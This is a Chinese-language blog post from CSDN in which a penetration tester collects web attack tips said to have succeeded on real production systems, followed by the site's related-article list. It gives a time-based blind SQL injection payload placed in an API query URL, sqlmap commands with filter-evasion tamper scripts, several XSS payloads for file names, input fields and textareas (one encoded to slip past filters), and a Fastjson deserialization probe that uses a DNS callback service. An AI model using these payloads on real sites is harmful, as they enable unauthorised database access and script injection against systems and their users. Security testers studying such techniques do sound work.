web渗透经验汇总ing

最新推荐文章于 2023-11-02 22:25:03 发布
最新推荐文章于 2023-11-02 22:25:03 发布
阅读量605 收藏 1
点赞数 1
分类专栏: 渗透测试一些总结 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haoaaao/article/details/125877647
版权

前言

//记录真实系统中成功过的小tips🌟,毕竟靶场和生产环境相差还是很大的,**读万卷书不如行万里路**//

0x00、SQL

一次众测实战sql注入绕过  SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现——ZAKER,个性化推荐热门新闻,本地权威媒体资讯http://app.myzaker.com/news/article.php?pk=6035b5af8e9f09165c74a1ccmysql rlike concat_时间盲注子查询与rlike_丧心病狂刘老湿的博客-CSDN博客sql注入首先尝试单引号;当单引号不报错的时候,尝试宽字节注入%df'(--tamper=unmagicquotes)1、时间盲注子查询(SELECT(SLEEP(5)))jHpaPayload: id=1 AND 4301=BENCHMARK(5000000,MD5(0x67426a42))2、rlike报错当使用正则匹配时,使用REGEXP和NOTREGEXP操作符(或RLIKE和NOTR...https://blog.csdn.net/weixin_29611737/article/details/113910368

一、系统中成功过的那些闭合

❤️http://ip/api/user/query?atSchoolStatus=&current_page=1&department=01'and(select*from(select+sleep(5))a+union+select+1)='&email=212&enabledStatus=&idCardNumber=&idCardType=

二、系统中成功过的那些sqlmap语句

//sql现在少的我都要怀疑我自己了

python sqlmap.py -r 1.txt --time-sec 8 --tamper=space2mysqlblank.py --batch --level 3 -p canshu
sqlmap -r xxx.txt --tamper=space2comment --level 3 --batch

0x01、XSS

✨系统中那些成功过的绕过姿势

1、文件附件

//ps:前端验证

❤️<img src=x οnerrοr=confirm(1)>.jpg

2、input标签

❤️”><img src=1 οnerrοr=alert(1)>

3、textarea标签

❤️unicode编码绕过:

</textarea><img src="x" οnerrοr="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;">

❤️

✨绕过姿势汇总

XSS总结ing_haoaaao的博客-CSDN博客xss姿势合集https://blog.csdn.net/haoaaao/article/details/125553450?spm=1001.2014.3001.5501

0x02、反序列化

1、Fastjson

//发送数据包中发现fastjson框架,进行尝试。

步骤:

(1)去https://dig.pm/上申请dns。

 

(2)payload:{{"@type":"java.net.URL","val":"http://dns"}:"summer"},替换payload里的dns,点击post发包。

(3)打开dig网站的“results”,有漏洞,results会有回显。

haoaaao
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Proyecto-Ing.Web
02-24
Proyecto-Ing.Web
web渗透思路及总结
最新发布
bdfcfff77fa的博客
01-02 383
(一)针对网站程序,不考虑服务器。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
web渗透测试实战过程(详细)
热门推荐
qq_38348692的博客
08-24 1万+
看过freebuf上的两篇渗透实战文章,总结一下全过程,传送门如下: 全程带阻:记一次授权网络攻防演练(上) 全程带阻:记一次授权网络攻防演练(下) 测试过程全部过程导图: 渗透过程问题处理思路: 登录功能的审查点很多,比如账号是否可枚举、密码是否可暴破,但前提是没有验证码。 密码找回功能很容易出现逻辑错误,经验来看,至少可从七个方面攻击密码找回功能: a. 重置凭证接收端可篡改 b...
网站安全渗透测试公司的五年经验总结
网站安全专家
02-22 2068
5年,说长也长,说短也短,以前在A3年,从公司的自建房十多人,到走的那时候,上百人,自主创业不容易,一路上说不出的艰苦,也算记录了一个互联网公司的发展壮大,而且据说听闻发展壮大的也非常好,很有可能快挂牌上市了。以后跳到了一个招标方,通称B公司,到现在,又做了3年,可是与在A公司不同,身处招标方,不单单是是分析网络安全问题了,更重视的是维护公司的安全,促进安全建设。刚刚的那时候,公司五百多人,到现在快到一千八人。到公司的挂牌上市,也是人的一生较为难能可贵的行业发展机会。有的那时候我经常说,我可能也是比其他人走
BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)
liaomin416100569的专栏
12-13 9649
渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透。Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。
Web安全攻防渗透测试
m0_63223219的博客
04-05 6795
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
ING_Web_Notes
02-15
网站日常学习记录 主要包括的内容 ass 打字稿 react hook封装请求 网络包 承诺 轴距 节点
ING.WEB-II:CLASE1
02-13
ING.WEB-II:CLASE1
自学ing圆周率.sln
11-30
自学ing圆周率.sln
Web前端.DAY10-ing对象.avi
05-17
Web前端.DAY10-ing对象.avi
【网络安全Web渗透测试(全流程)
jennycisp的博客
11-02 1365
发现:一共开放两个端口,80为web访问端口,3389为windows远程登陆端口,嘿嘿嘿,试一下发现:是Windows Server 2003系统,OK,到此为止。
web渗透】专栏文章汇总
武天旭的博客
02-28 1173
一、基础部分 web渗透–1–写在开始 web渗透–2–web安全原则(上) web渗透–3–web安全原则(下) web渗透–4–web渗透测试清单 web渗透–5–自动化漏洞扫描 web渗透–6–Google Hacking 二、渗透测试部分 web渗透–7–web服务器指纹识别 web渗透–8–枚举web服务器应用
Web渗透测试---Web TOP 10 漏洞
weixin_56319791的博客
10-27 5415
Web渗透测试---Web Top 10 漏洞
WEB网络渗透的基础知识
2201_75362610的博客
03-01 4409
网络渗透是攻击者常用的一种攻击手段,也是一种综合的高级攻击技术,同时网络渗透也是安全工作者所研究的一个课题,在他们口中通常被称为”渗透测试。
web渗透信息收集知识总结
IerkeU的博客
12-05 3909
信息收集: 信息收集步骤? whois信息查询、网站备案信息查询、子域名信息收集,确定目标真实IP(CDN)、绕过CDN查找真实IP、端口服务探测 在线扫描、web应用指纹信息(CMS识别)、web目录探测、敏感文件、旁站、C段、WAF探测、网络空间资产搜索引擎信息收集 什么是信息收集? 信息搜集也称踩点,信息搜集毋庸置疑就是尽可能的搜集目标的信息,包括端口信息、DNS信息、员工邮箱等等看似并不起眼的一些信息都算是信息搜集,这些看似微乎其微的信息,对于渗透测试而言就关乎到成功与否了 信息搜集的分类 主动式
渗透测试-----6-web渗透
weixin_62693307的博客
01-17 88
Set- Cookie:服务器发给客户端的SESSIONID(被盗取的风险)300s:重定向,通常在身份认证成功后重定向到一个安全页面(301/302)Location:重定向用户到另一个页面,可识别身份认证后允许访问的页面。Cookie:客户端发挥给服务器证明用户状态的信息(头和值成对出现)服务器响应的状态码表示响应的结果类型(5大类50多个具体响应码)100s:服务器响应的信息,通常表示服务器还有后续处理,很少出现。200s:请求被服务器成功接收并处理后返回的响应结果。401:想要身份验证。
我的web渗透学习心得(一)
whiteinblack
05-01 1万+
        好久没写博客了,上次写博客还是在上学期.而且以前写博客都是写写一周做了些什么.这次分享一些自己学web渗透的一些心得吧(仅作个人心得,谨慎参照,有大佬路过还望指点一下~).此前一直在学Java web.这次趁着五一假期好好钻研了下web渗透.其实我一直觉得每个学计算机的人都有黑客梦,炫酷吊炸天啊......其实很早我就想学web安全.上学期在工作室学了一个学期的前端打了下基础.看了...
verilog ing
07-27
回答: 在Verilog中,"ing"通常是指进行某种操作或过程的进行中。根据提供的引用内容,可以看出这些引用是关于Verilog代码的片段。\[1\]是一个SRAM写操作的示例,其中包括了片选、写使能、读使能、地址和数据的设置。\[2\]是一个产生占空比非50%的时钟的方法示例,其中使用了参数和时钟周期的设置。\[3\]是一个测试文件的模块定义示例,其中包括了信号声明、逻辑设计和激励产生的部分。综合起来,这些引用提供了Verilog代码中的一些常见操作和设计示例。 #### 引用[.reference_title] - *1* *2* *3* [Verilog测试:TestBench结构](https://blog.csdn.net/qq_26652069/article/details/96422293)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

haoaaao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值